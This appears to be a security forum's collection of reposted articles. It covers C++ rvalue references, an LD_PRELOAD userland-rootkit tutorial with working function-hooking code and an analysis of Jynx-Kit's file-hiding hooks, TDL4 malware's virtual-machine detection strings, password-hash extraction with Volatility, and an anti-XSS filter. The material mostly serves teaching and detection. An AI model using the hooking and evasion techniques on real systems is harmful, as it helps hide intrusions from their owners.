v2 = move(v1);  // Move ok. Ownership of pointers transferred to v2.

Many standard algorithms benefit from moving elements of the sequence as opposed to copying them. This not only provides better performance (like the improved std::swap implementation described above), but also allows these algorithms to operate on movable but non-copyable types. For example the following code sorts a vector<unique_ptr<T>> based on comparing the pointed-to types:

struct indirect_less
{
    template <class T>
    bool operator()(const T& x, const T& y) {return *x < *y;}
};
...
std::vector<std::unique_ptr<A>> v;
...
std::sort(v.begin(), v.end(), indirect_less());

As sort moves the unique_ptr's around, it will use swap (which no longer requires Copyability) or move construction / move assignment. Thus during the entire algorithm, the invariant that each item is owned and referenced by one and only one smart pointer is maintained. If the algorithm were to attempt a copy (say, by programming mistake) a compile time error would result.

Perfect Forwarding

Consider writing a generic factory function that returns a std::shared_ptr for a newly constructed generic type. Factory functions such as this are valuable for encapsulating and localizing the allocation of resources. Obviously, the factory function must accept exactly the same sets of arguments as the constructors of the type of objects constructed.
Today this might be coded as:

template <class T>
std::shared_ptr<T> factory()  // no argument version
{
    return std::shared_ptr<T>(new T);
}

template <class T, class A1>
std::shared_ptr<T> factory(const A1& a1)  // one argument version
{
    return std::shared_ptr<T>(new T(a1));
}

// all the other versions

In the interest of brevity, we will focus on just the one-parameter version. For example:

std::shared_ptr<A> p = factory<A>(5);

Question: What if T's constructor takes a parameter by non-const reference? In that case, we get a compile-time error as the const-qualified argument of the factory function will not bind to the non-const parameter of T's constructor. To solve that problem, we could use non-const parameters in our factory functions:

template <class T, class A1>
std::shared_ptr<T> factory(A1& a1)
{
    return std::shared_ptr<T>(new T(a1));
}

This is much better. If a const-qualified type is passed to the factory, the const will be deduced into the template parameter (A1 for example) and then properly forwarded to T's constructor. Similarly, if a non-const argument is given to factory, it will be correctly forwarded to T's constructor as a non-const. Indeed, this is precisely how forwarding applications are coded today (e.g. std::bind). However, consider:

std::shared_ptr<A> p = factory<A>(5);  // error
A* q = new A(5);                       // ok

This example worked with our first version of factory, but now it's broken: The "5" causes the factory template argument to be deduced as int& and subsequently will not bind to the rvalue "5". Neither solution so far is right. Each breaks reasonable and common code.

Question: What about overloading on every combination of A1& and const A1&? This would allow us to handle all examples, but at a cost of an exponential explosion: For our two-parameter case, this would require 4 overloads. For a three-parameter factory we would need 8 additional overloads. For a four-parameter factory we would need 16, and so on. This is not a scalable solution.
Rvalue references offer a simple, scalable solution to this problem:

template <class T, class A1>
std::shared_ptr<T> factory(A1&& a1)
{
    return std::shared_ptr<T>(new T(std::forward<A1>(a1)));
}

Now rvalue arguments can bind to the factory parameters. If the argument is const, that fact gets deduced into the factory template parameter type.

Question: What is that forward function in our solution? Like move, forward is a simple standard library function used to express our intent directly and explicitly, rather than through potentially cryptic uses of references. We want to forward the argument a1, so we simply say so. Here, forward preserves the lvalue/rvalue-ness of the argument that was passed to factory. If an rvalue is passed to factory, then an rvalue will be passed to T's constructor with the help of the forward function. Similarly, if an lvalue is passed to factory, it is forwarded to T's constructor as an lvalue. The definition of forward looks like this:

template <class T>
struct identity
{
    typedef T type;
};

template <class T>
T&& forward(typename identity<T>::type&& a)
{
    return a;
}

References

As one of the main goals of this paper is brevity, there are details missing from the above description. But the above content represents 95% of the knowledge with a fraction of the reading. This proposal was initially put forth in the following paper. The present article is substantially a reprint of the original proposal: Hinnant, Howard E., Bjarne Stroustrup, and Bronek Kozicki. A Brief Introduction to Rvalue References Rvalue Reference Quick Look For further details on the motivation of move semantics, such as performance tests, details of movable but non-copyable types, and many other details please see N1377. For a very thorough treatment of the forwarding problem, please see N1385. For further applications of the rvalue reference (besides move semantics and perfect forwarding), please see N1690.
For proposed wording for the language changes required to standardize the rvalue reference, please see N1952. For a summary of the impact the rvalue reference will have on the standard library, please see N1771. For proposed wording for the library changes required to take advantage of the rvalue reference, please see: N1856 N1857 N1858 N1859 N1860 N1861 N1862 For a proposal to extend the rvalue reference to the implicit object parameter (this), please see N1821. Share your opinion Have an opinion about Rvalue references? Discuss this article in the Articles Forum topic, A Brief Introduction to Rvalue References. About the Authors Howard Hinnant is the lead author of the rvalue reference proposals for the next C++ standard. He implemented and maintained the standard C++ library for Metrowerks/Motorola/Freescale from the late 90's to 2005. He is currently a senior software engineer at Apple and serving on the C++ standards committee as Library Working Group chairman. Bjarne Stroustrup is the designer and original implementor of the C++ Programming Language. He is currently the College of Engineering Endowed Chair in Computer Science at Texas A&M University. He formerly worked as the head of AT&T Lab's Large-scale Programming Research department, from its creation until late 2002. Bronek Kozicki is an experienced C++ programmer. He is a member of BSI C++ panel and author of "extending move semantics to *this" proposal (N1821, evolved to N2439). Bronek currently works for a leading investment bank in London. Sursa: A Brief Introduction to Rvalue References
  6. The magic of LD_PRELOAD for Userland Rootkits

Posted on October 31, 2011 by FlUxIuS

How much can you trust the binaries you are running, even if you analyzed them before compilation? With fewer privileges than kernel rootkits (explained in “Ring 0f Fire”), userland rootkits still represent a big threat for users. To see this, we will talk about an interesting technique for hooking functions that programs commonly use from shared libraries. First, we will quickly introduce the use of shared libraries, then explain the need for the LD_PRELOAD trick. After that, we will see how to apply it to a rootkit, its limits, and the question of its detection, which some anti-rootkits unsurprisingly fail at.

Prerequisites: basics in Linux and ELF (read the analysis part of my last article), a Linux box, survival skills in the C programming language, your evil mind switched on (or just be cool!), another default song: Ez3kiel – Via continium.

Here is the contents: Shared libraries, LD_PRELOAD in the wild, Make and use your own library, dlsym: Yo Hook Hook And A Bottle Of Rum!, Limitations, Userland rootkit, Jynx-Kit, Detection

Shared libraries

As we should know, when a program starts, it loads shared libraries and links them to the process. The linking process is done by "ld-linux-x86-64.so.X" (or "ld-linux.so.X" for 32 bits) (remember "The Art Of ELF"?), as follows:

fluxiux@handgrep:~$ readelf -l /bin/ls
[...]
INTERP 0x0000000000000248 0x0000000000400248 0x0000000000400248
       0x000000000000001c 0x000000000000001c R 1
    [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
[...]

As opposed to static compilation, which can weigh heavily on your hard disk, shared libraries allow dynamically linked binaries to factor out common code: the linking process makes function calls point to the corresponding function in the shared library.
You can list the shared libraries needed by a program with the "ldd" command:

fluxiux@handgrep:~$ ldd /bin/ls
linux-vdso.so.1 => (0x00007fff0bb9a000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f7842edc000)
librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f7842cd4000)
libacl.so.1 => /lib/x86_64-linux-gnu/libacl.so.1 (0x00007f7842acb000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7842737000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f7842533000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7843121000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f7842314000)
libattr.so.1 => /lib/x86_64-linux-gnu/libattr.so.1 (0x00007f784210f000)

Let's try with a little code named "toto":

#include <stdio.h>

main()
{
    printf("huhu la charrue");
}

Compile it now both dynamically and statically:

fluxiux@handgrep:~$ gcc toto.c -o toto-dyn
fluxiux@handgrep:~$ gcc -static toto.c -o toto-stat
fluxiux@handgrep:~$ ls -l | grep "toto-"
-rwxr-xr-x 1 fluxiux fluxiux   8426 2011-10-28 23:21 toto-dyn
-rwxr-xr-x 1 fluxiux fluxiux 804327 2011-10-28 23:21 toto-stat

As we can see, "toto-stat" is almost 96 times heavier than "toto-dyn". Why?:

fluxiux@handgrep:~$ ldd toto-stat
not a dynamic executable

This approach is very flexible and sophisticated because we can[1]: update libraries and still support programs that want to use older, non-backward-compatible versions of those libraries; override specific libraries or even specific functions in a library when executing a particular program; do all this while programs are running using existing libraries. Shared libraries follow a special naming convention, the "soname". A soname has the prefix "lib", followed by the name of the library, then ".so", a period, and a version number that is incremented whenever the interface changes (as you can see in the previous listings). Now, let's talk about the LD_PRELOAD trick.

LD_PRELOAD in the wild

As you can see, libraries are generally located in the "/lib" folder.
So if we want to patch some library like "libc", the first idea is to modify the sources and recompile everything into a shared library following the "soname" convention. But instead of doing this, we can use a wonderful trick that Linux offers us: LD_PRELOAD.

Use your own library

Suppose we want to change the "printf" function without recompiling the whole source. To do that, we will override this function in the "my_printf.c" code:

#define _GNU_SOURCE
#include <stdio.h>

int printf(const char *format, ...)
{
    exit(153);
}

Now we have to compile[2] this code into a shared library as follows:

fluxiux@handgrep:~$ gcc -Wall -fPIC -c -o my_printf.o my_printf.c
my_printf.c: In function ‘printf’:
my_printf.c:6:2: warning: implicit declaration of function ‘exit’
my_printf.c:6:2: warning: incompatible implicit declaration of built-in function ‘exit’
fluxiux@handgrep:~$ gcc -shared -fPIC -Wl,-soname -Wl,libmy_printf.so -o libmy_printf.so my_printf.o

To use this library, we set the environment variable "LD_PRELOAD" to the absolute path of the "libmy_printf.so" library, so that our function is executed instead of glibc's:

fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so
fluxiux@handgrep:~$ ./toto-dyn

As we can see, the string "huhu la charrue" didn't show up, so we will trace library calls with "ltrace" to see what happens:

fluxiux@handgrep:~$ ltrace ./toto-dyn
__libc_start_main(0x4015f4, 1, 0x7fffa88d0908, 0x402530, 0x4025c0 <unfinished ...>
printf("huhu la charrue" <unfinished ...>
+++ exited (status 153) +++

Incredible! Our library was called first thanks to the "LD_PRELOAD" environment variable. But if we want to alter the behavior of the "printf" function without changing its appearance for users, do we have to rewrite the whole function just to modify a few lines? No! It is possible to hook a function much more easily and discreetly.

dlsym: Yo Hook Hook And A Bottle Of Rum!
The "libdl" library provides some interesting functions: dlopen(), which loads a library; dlsym(), which returns the pointer to a specified symbol; and dlclose(), which unloads a library. Because libraries are loaded at process launch, we only need to get the pointer to the symbol "printf" to use the original function. But how do we do that when we have overridden the function? We pass "RTLD_NEXT" as an argument, to get a pointer to the next (i.e. the original) occurrence of the function:

[...]
typeof(printf) *old_printf;
[...]
/* DO HERE SOMETHING VERY EVIL */
old_printf = dlsym(RTLD_NEXT, "printf");
[...]

After that, we need to format the string passed as an argument and call the original function with this formatted string ("huhu la charrue"), so that it is shown as expected:

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <stdarg.h>

int printf(const char *format, ...)
{
    va_list list;
    char *parg;
    typeof(printf) *old_printf;

    // format variable arguments
    va_start(list, format);
    vasprintf(&parg, format, list);
    va_end(list);

    /* DO HERE SOMETHING VERY EVIL */

    // get a pointer to the function "printf"
    old_printf = dlsym(RTLD_NEXT, "printf");

    (*old_printf)("%s", parg); // and we call the function with the previous arguments

    free(parg);
}

We compile it:

fluxiux@handgrep:~$ gcc -Wall -fPIC -c -o my_printf.o my_printf.c
my_printf.c: In function ‘printf’:
my_printf.c:21:1: warning: control reaches end of non-void function
fluxiux@handgrep:~$ gcc -shared -fPIC -Wl,-soname -Wl,libmy_printf.so -ldl -o libmy_printf.so my_printf.o
fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so

And execute it:

fluxiux@handgrep:~$ ./toto-dyn
huhu la charrue

Wonderful! A user cannot suspect that something evil is going on when executing his own program now. But there are some limitations to the LD_PRELOAD trick.

Limitations

This trick is very good but limited.
Indeed, if you try with the static version of "toto" (toto-stat), the kernel will just load each segment at the specified virtual address, then jump to the entry point. This means that no linking is done by the program interpreter. Moreover, if the SUID or SGID bit is set to "1", LD_PRELOAD will not work, for security reasons (too bad!). For more information about "LD_PRELOAD", I suggest you read the article by Etienne Duble[3] (in French), which inspired this post a lot.

Userland rootkit

Jynx-Kit

About 2 weeks ago, a new userland rootkit[4] was released. This rootkit comes with an automated bash script to install it easily and is undetected by rkhunter and chkrootkit. To learn more about it, we will analyze it. The interesting part is in "ld_poison.c", where fourteen functions are hooked:

[...]
old_fxstat = dlsym(RTLD_NEXT, "__fxstat");
old_fxstat64 = dlsym(RTLD_NEXT, "__fxstat64");
old_lxstat = dlsym(RTLD_NEXT, "__lxstat");
old_lxstat64 = dlsym(RTLD_NEXT, "__lxstat64");
old_open = dlsym(RTLD_NEXT, "open");
old_rmdir = dlsym(RTLD_NEXT, "rmdir");
old_unlink = dlsym(RTLD_NEXT, "unlink");
old_unlinkat = dlsym(RTLD_NEXT, "unlinkat");
old_xstat = dlsym(RTLD_NEXT, "__xstat");
old_xstat64 = dlsym(RTLD_NEXT, "__xstat64");
old_fdopendir = dlsym(RTLD_NEXT, "fdopendir");
old_opendir = dlsym(RTLD_NEXT, "opendir");
old_readdir = dlsym(RTLD_NEXT, "readdir");
old_readdir64 = dlsym(RTLD_NEXT, "readdir64");
[...]

As an example, have a look at the "open" function. As you can see, a "__xstat" is performed to get file information:

[...]
struct stat s_fstat;
[...]
old_xstat(_STAT_VER, pathname, &s_fstat);
[...]

After that, this information is compared against the group ID and the paths ("ld.so.preload", the magic directory) that the rootkit wants to hide. If the information matches, the function doesn't return any result:

[...]
if(s_fstat.st_gid == MAGIC_GID || (strstr(pathname, MAGIC_DIR) != NULL) || (strstr(pathname, CONFIG_FILE) != NULL)) {
    errno = ENOENT;
    return -1;
}
[...]
Every hooked function is organized like this, and people are not supposed to notice any suspicious file or activity (like the back-connect shell). But what about detection?

Detection

Surprisingly (or not), this rootkit is undetected by rkhunter and chkrootkit. The reason is that these two anti-rootkits check for signatures, and as we should know, this is not the best approach. Indeed, for example, just clear the "LD_PRELOAD" variable and generate a "sha1sum" of "toto", as follows:

fluxiux@handgrep:~$ sha1sum toto-dyn
a659c72ea5d29c9a6406f88f0ad2c1a5729b4cfa toto-dyn
fluxiux@handgrep:~$ sha1sum toto-dyn > toto-dyn.sha1

And then set the "LD_PRELOAD" variable and check whether the sum is correct:

fluxiux@handgrep:~$ export LD_PRELOAD=$PWD/libmy_printf.so
fluxiux@handgrep:~$ sha1sum -c toto-dyn.sha1
toto-dyn: OK

IT… IS… CORRECT???! Exactly! We didn't modify anything in the ELF file, so the checksum should be the same, and it is. If anti-rootkits like rkhunter work like that, detection is bound to fail. Other techniques are based on detecting suspicious files, signatures and port binding, as in "chkrootkit", but they fail too, because this type of rootkit is very flexible; in Jynx we even have a sort of port knocking to open the remote shell for our host. To catch these rootkits, you could check for any suspicious library specified in "LD_PRELOAD" or "/etc/ld.so.preload". We also know that "dlsym" can be used to call the original function while altering it:

$ strace ./bin/ls
[...]
open("/home/fluxiux/blabla/Jynx-Kit/ld_poison.so", O_RDONLY) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\n\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=17641, ...}) = 0
mmap(NULL, 2109656, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f5e1a586000
mprotect(0x7f5e1a589000, 2093056, PROT_NONE) = 0
mmap(0x7f5e1a788000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7f5e1a788000
close(3)
[...]
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY) = 3
[...]

And by disassembling the "ld_poison.so" file, we can see that there are many substitutions in functions that could hide malicious files or activities. Looking for strings in the binary, when it is not packed, can provide some interesting clues (but keep in mind that packing itself is sometimes suspicious):

fluxiux@handgrep:~/blabla/Jynx-Kit$ strings ld_poison.so
[...]
libdl.so.2
[...]
dlsym
fstat
[...]
lstat hooked.
ld.so.preload
xochi <-- sounds familiar
[...]
/proc/%s <-- hmmm... strange!
[...]

A rootkit like Jynx-Kit proves that signature-based detection is a hopeless way to protect ourselves against technologies like rootkits. If you want to do it right, base your detection on heuristics. To finish, there are also some interesting forensic tools that cross-check results obtained through several techniques ("/bin/ps" output against "/proc", "procfs" walking and "syscall"). Indeed, Security By Default has published a dedicated analysis of Jynx-Kit[5], which made me discover Unhide[6], a tool that checks for hidden processes and open ports (by brute-forcing all available TCP/UDP ports).

References & Acknowledgements

[1] Shared libraries – http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
[2] Static, Shared Dynamic and Loadable Linux Libraries – http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html
[3] (French) Le monde merveilleux de LD_PRELOAD – Open Silicium Magazine #4
[4] Jynx-Kit LD_PRELOAD Rootkit Release – http://forum.blackhatacademy.org/viewtopic.php?id=186
[5] Analisis de Jynx (Linux Rootkit) – http://www.securitybydefault.com/2011/10/analisis-de-jynx-linux-rootkit.html
[6] Unhide – http://www.unhide-forensics.info

Sursa: http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/
  7. How To Use THC-Hydra

Description: In this video I show how to use the brute forcer Hydra.

Download: THC-HYDRA v7.1 Released - Insecure Stuff

If you have any problems, contact me on Twitter.

Video: http://www.securitytube.net/video/2381
http://www.youtube.com/watch?v=kzJFPduiIsI
  8. 'Nitro' Cyber-Spying Campaign Stole Data From Chemical, Defense Companies
By: Fahmida Y. Rashid 2011-10-31

Cyber-attackers targeted chemical and defense companies in a two-month-long campaign to steal sensitive information by infecting systems with the PoisonIvy Trojan.

Symantec has identified a cyber-spying campaign to steal information from chemical and defense companies around the world. Dubbed 'Nitro' by Symantec, the campaign began last April, according to a whitepaper released by Symantec Oct. 31. Cyber-attackers originally targeted human rights organizations and the auto industry before moving on to the chemical industry in July.

At least 48 companies are believed to have been targeted across various industry verticals, including 29 companies involved in the research and development of chemical compounds and companies that develop materials for military vehicles. The other 19 were in other sectors, including defense. A dozen victims were based in the United States, five were in the United Kingdom, and others were in Denmark, Italy, the Netherlands and Japan. Even so, the largest percentage of affected systems was in the United States and Bangladesh.

"The purpose of the attacks appears to be industrial espionage, collecting intellectual property for competitive advantage," wrote Eric Chien and Gavin O'Gorman in the whitepaper.

The campaign relied on email with the well-known off-the-shelf Trojan PoisonIvy attached to the message. One set of emails was sent to targeted recipients within the organization, pretending to be meeting invitations from known business partners; the other set was sent to a larger group of victims and masqueraded as a security update, according to Symantec. Once on the system, PoisonIvy opened a backdoor, contacted a remote command-and-control server, and transmitted the IP address, the names of all other computers in the workgroup or domain, and a dump of Windows cached password hashes.
“By using access to additional computers through the currently logged-on user or passwords cracked from the dumped hashes, the attackers then began traversing the network, infecting additional computers,” Symantec researchers wrote.

The attackers' primary goal appeared to be obtaining domain administrator credentials and gaining access to a system where intellectual property was stored, according to Symantec. The attackers' behavior varied slightly with each compromise, but once the intellectual property was found, they copied the contents to a handful of internal systems that had been designated as a staging area. The data was then uploaded to a remote server, which was traced to a virtual private server (VPS) in the United States owned by a “20-something male located in the Hebei region in China,” according to Symantec.

The technique was similar to what attackers allegedly did during the August attack on Japan's largest defense contractor, Mitsubishi Heavy Industries, but Symantec declined to identify any of the affected Japanese companies. Attackers are increasingly launching reconnaissance activities to ferret out sensitive information before extracting it from organizations, Noa Bar-Yosef, a senior security strategist at Imperva, told eWEEK in an earlier interview.

Developed by a Chinese coder, PoisonIvy is widely available on the Internet and has its own Website. It has been implicated in recent attacks, including the campaign that compromised RSA Security and allowed thieves to steal information related to the SecurID authentication technology.

Symantec said other groups targeted some of the same chemical companies during the same period by sending malicious PDF and DOC files that exploit vulnerabilities to download Sogu, a backdoor Trojan. It was "difficult" to determine whether the Nitro gang using PoisonIvy was related to the group using Sogu, but "unlikely" because the attack methods were so different, according to Symantec.
Source: http://www.eweek.com/c/a/Security/Nitro-CyberSpying-Campaign-Stole-Data-From-Chemical-Defense-Companies-863610/

Pff, they got my name wrong.
  9. Android Reverse Engineering VM

The virtual machine is available here: http://redmine.honeynet.org/Android.tar.gz

You must extract the virtual machine:

tar xvzf Android.tar.gz

and load it with VirtualBox by adding a new virtual machine.

Software
- Androguard
- Android SDK/NDK
- APKInspector
- Apktool
- Axmlprinter
- Ded
- Dex2jar
- DroidBox
- Jad
- Smali/Baksmali

Would you like your software included in ARE? Please report an issue.

Login/Password
The login is: android
The password is: android

Source: http://redmine.honeynet.org/projects/are/wiki
  10. Volatility 2.0 - Advanced Memory Forensics [With Video Demonstration]
POSTED BY THN REPORTER ON 10/30/2011 03:10:00 AM

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, yet offer unprecedented visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work in this exciting area of research.

The Volatility Framework demonstrates our commitment to, and belief in the importance of, open source digital investigation tools. Volatile Systems is committed to the belief that the technical procedures used to extract digital evidence should be open to peer analysis and review. We also believe this is in the best interest of the digital investigation community, as it helps increase the communal knowledge about systems we are forced to investigate. Similarly, we do not believe the availability of these tools should be restricted, and we therefore encourage people to modify, extend, and make derivative works, as permitted by the GPL.
Capabilities

The Volatility Framework currently provides the following extraction capabilities for memory samples:
- Image date and time
- Running processes
- Open network sockets
- Open network connections
- DLLs loaded for each process
- Open files for each process
- Open registry handles for each process
- A process's addressable memory
- OS kernel modules
- Mapping physical offsets to virtual addresses (strings to process)
- Virtual Address Descriptor information
- Scanning examples: processes, threads, sockets, connections, modules
- Extracting executables from memory samples
- Transparent support for a variety of sample formats (i.e., crash dump, hibernation, DD)
- Automated conversion between formats

Video Demonstration: This video shows grabbing the Windows NTLM password hashes from a memory dump and then using John the Ripper to crack them.

Video: http://www.youtube.com/watch?v=YO1mlynbsmc

Download: https://www.volatilesystems.com/default/volatility

Source: Volatility 2.0 - Advanced Memory Forensics [With Video Demonstration] ~ THN : The Hacker News
  11. A practical solution using token-based attributes to prevent XSS. Can you break #JSLR?

JSLR uses randomized attributes and tags to prevent an attacker from injecting malicious content. The HTML is parsed via the DOM before it is rendered, and only legitimate attributes make it through. DOM-based injection inside allowed scripts and attributes can be prevented by randomizing quotes.

jslr.js:

window.JSLR = function(id, singleQuote, doubleQuote) {
  document.write('<plaintext id="JSLRElement" />');
  document.addEventListener('DOMContentLoaded', function() {
    var JSLRElement, JSLRContents, html, i, j, k, re, pn, len, tagName,
        attrNamesToRemove = [], attrToAdd = [], allowedTag = false,
        script, text;
    JSLRElement = document.getElementById('JSLRElement');
    JSLRContents = JSLRElement.textContent ? JSLRElement.textContent
                                           : JSLRElement.innerHTML;
    html = document.implementation.createHTMLDocument('');
    JSLRElement.parentNode.innerHTML = '';
    html.body.innerHTML = JSLRContents;
    j = html.getElementsByTagName('*');
    for (i = 0; i < j.length; i++) {
      tagName = j[i].tagName;
      if (!tagName) {
        try { j[i].removeNode(true); } catch (e) {}
        try { j[i].parentNode.removeChild(j[i]); } catch (e) {}
      }
      if (/^(?:object|embed|script|textarea|button|style|svg)$/i.test(tagName) &&
          !/^(?:canvas|form|optgroup|legend|fieldset|label|option|select|input|audio|aside|article|a|abbr|acronym|address|area|b|bdo|big|br|canvas|caption|center|cite|code|col|dd|del|dfn|dir|div|dl|dt|em|font|h[1-6]|hr|i|img|ins|kbd|li|map|ol|p|pre|q|s|samp|small|span|strike|strong|sub|sup|table|tbody|td|tfoot|th|thead|tr|tt|u|ul|blockquote|image|video|xmp)$/i.test(tagName)) {
        allowedTag = false;
        try {
          for (k = 0; k < j[i].attributes.length; k++) {
            re = new RegExp('^' + id + '_$');
            if (re.test(j[i].attributes[k].name)) {
              allowedTag = true;
            }
          }
        } catch (e) {}
        if (allowedTag) { continue; }
        try { j[i].removeNode(true); } catch (e) {}
        try { j[i].parentNode.removeChild(j[i]); } catch (e) {}
      }
      try {
        attrNamesToRemove = [];
        attrToAdd = [];
        for (k = 0; k < j[i].attributes.length; k++) {
          re = new RegExp('^' + id + '_');
          if (!re.test(j[i].attributes[k].name)) {
            attrNamesToRemove.push(j[i].attributes[k].name);
          } else {
            attrToAdd.push({
              name: (j[i].attributes[k].name + '').replace(re, ''),
              value: j[i].getAttribute(j[i].attributes[k].name) + ''
            });
            attrNamesToRemove.push(j[i].attributes[k].name);
          }
        }
        for (k = 0; k < attrToAdd.length; k++) {
          if (/^on/i.test(attrToAdd[k].name)) {
            j[i][attrToAdd[k].name] = new Function(attrToAdd[k].value);
          } else {
            j[i].setAttribute(attrToAdd[k].name, attrToAdd[k].value);
          }
          if (j[i].protocol) {
            if (!/^https?:?/i.test(j[i].protocol) &&
                !j[i].getAttribute(id + '_javascriptprotocol')) {
              j[i].setAttribute(attrToAdd[k].name, '#');
            }
          }
        }
        for (k = 0; k < attrNamesToRemove.length; k++) {
          j[i].removeAttribute(attrNamesToRemove[k]);
        }
      } catch (e) {}
    }
    j = html.getElementsByTagName('*');
    for (i = 0; i < j.length; i++) {
      if (/^script$/i.test(j[i].tagName)) {
        script = document.createElement('script');
        if (j[i].type) { script.type = j[i].type; }
        if (j[i].src) { script.src = j[i].src; }
        if (j[i].text) {
          text = j[i].text;
          text = text.replace(/['"]/g, '');
          text = text.replace(new RegExp('(?:' + singleQuote + ')', 'g'), "'");
          text = text.replace(new RegExp('(?:' + doubleQuote + ')', 'g'), '"');
          script.text = text;
        }
        document.getElementsByTagName('head')[0].appendChild(script);
      }
    }
    pn = document.body.parentNode;
    pn.removeChild(document.body);
    pn.appendChild(html.body);
    html = null;
  }, false);
  return null;
};

Test: http://www.businessinfo.co.uk/labs/jslr/jslr.php
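Outside the browser, the whitelisting idea is easy to model: markup survives only if it carries the per-response random token. Below is a hedged Python sketch of just the attribute pass; jslr_filter and its regex-based parsing are simplifications for illustration only (JSLR itself works on the DOM and also whitelists tags):

```python
import re

def jslr_filter(html, token):
    """Keep only attributes whose name starts with '<token>_' (stripping
    the prefix); every other attribute is treated as injected and dropped.
    This models the attribute pass of JSLR, not the full tag whitelist."""
    def clean_tag(m):
        tag, attrs = m.group(1), m.group(2)
        kept = []
        prefix = token + "_"
        for name, value in re.findall(r'([\w-]+)="([^"]*)"', attrs):
            if name.startswith(prefix):
                kept.append('%s="%s"' % (name[len(prefix):], value))
        return "<%s%s>" % (tag, "".join(" " + a for a in kept))
    return re.sub(r'<(\w+)((?:\s+[\w-]+="[^"]*")*)\s*>', clean_tag, html)

# The attacker-injected onclick lacks the token, so it is dropped;
# the server-emitted tokenized href survives with its prefix stripped.
out = jslr_filter('<a abc123_href="/home" onclick="evil()">x</a>', "abc123")
print(out)  # <a href="/home">x</a>
```

The security of the real scheme rests on the token being unguessable per response, so injected markup can never carry the right prefix.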
  12. You should bring us shawarma from over there where you are.
  13. TDL4 tricks for detecting virtual machines
25/10/2011

Introduction

I have received several mails asking whether I am still active on my blog. The answer is YES! I'm just (very) busy with my internship and some personal projects. So today I have some news for you.

TDL4

I'm sorry for my English readers (if there are any), but my draft article covering all the reversing work on TDL4 is written in French. But you can use Google Translate! So here is the link to the article. Be careful, it covers an oldschool version (0.3); I'm currently studying the new version.

TDL4 (new version)

We will start with a trick for detecting virtual machines; apparently the new loader performs this check, unlike the loader from my article. Maybe it will not be new to you, but it was for me: I'm a beginner in malware analysis. It uses the WQL language to query Windows Management Instrumentation. I will not bore you with disassembly code; instead, here is a little script I wrote to defeat the Unicode string obfuscation.

The source code of the IDC script (I may be doing it wrong, but it's my first):

#include <idc.idc>

static String(ea)
{
    auto s, b, i;
    s = "";
    i = 0;
    while (i < 2)
    {
        b = Byte(ea);
        if (b)
        {
            s = s + form("%c", b);
            ea = ea + 2;
        }
        i++;
    }
    return s;
}

static main()
{
    auto ea;
    auto op;
    auto str;
    auto s;

    ea = SelStart();
    str = "";
    while (ea < SelEnd())
    {
        if (GetMnem(ea) != "mov")
            break;
        if (GetOpType(ea, 1) == 1)
            break;
        s = String(ea + 7);
        str = str + s;
        ea = FindCode(ea, SEARCH_DOWN | SEARCH_NEXT);
    }
    Message("%s\n", str);
}

With this script I was able to see all this interesting stuff:

Win32_BIOS
Win32_Process
Win32_DiskDrive
Win32_Processor
Win32_SCSIController
Name
Model
Manufacturer
Xen
QEMU
Bochs
Red Hat
Citrix
VMware
Virtual HD
VBOX
CaptureClient.exe
SELECT * FROM %s WHERE %s LIKE "%%%s%%"
SELECT * FROM %s WHERE %s = "%s"

First it gathers all this information about your PC and sends it to a C&C.
Then, for example, it checks whether "CaptureClient.exe" appears in the process list, or executes a request like SELECT * FROM Win32_DiskDrive WHERE Manufacturer = "VMware", and so on. This is how they can detect that you are running in a virtualized or emulated environment. I didn't know how WQL worked, so I decided to write a small test program:

#include <windows.h>
#include <objbase.h>
#include <atlbase.h>
#include <iostream>
#include <wbemidl.h>
#include <comutil.h>

int main(void)
{
    HRESULT hr;

    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (hr < 0) {
        std::cerr << "[-] COM initialization failed" << std::endl;
        return (-1);
    }
    hr = CoInitializeSecurity(NULL, -1, NULL, NULL,
                              RPC_C_AUTHN_LEVEL_DEFAULT,
                              RPC_C_IMP_LEVEL_IMPERSONATE,
                              NULL, EOAC_NONE, NULL);
    if (hr < 0) {
        std::cerr << "[-] Security initialization failed" << std::endl;
        return (-1);
    }
    CComPtr<IWbemLocator> locator;
    hr = CoCreateInstance(CLSID_WbemAdministrativeLocator, NULL,
                          CLSCTX_INPROC_SERVER, IID_IWbemLocator,
                          reinterpret_cast<void**>(&locator));
    if (hr < 0) {
        std::cerr << "[-] Instantiation of IWbemLocator failed" << std::endl;
        return (-1);
    }
    CComPtr<IWbemServices> service;
    hr = locator->ConnectServer(L"root\\cimv2", NULL, NULL, NULL,
                                WBEM_FLAG_CONNECT_USE_MAX_WAIT,
                                NULL, NULL, &service);
    CComPtr<IEnumWbemClassObject> enumerator;
    hr = service->ExecQuery(L"WQL", L"SELECT * FROM Win32_Process",
                            WBEM_FLAG_FORWARD_ONLY, NULL, &enumerator);
    //hr = service->ExecQuery(L"WQL", L"SELECT * FROM Win32_DiskDrive WHERE Model LIKE \"%VMware%\"", WBEM_FLAG_FORWARD_ONLY, NULL, &enumerator);
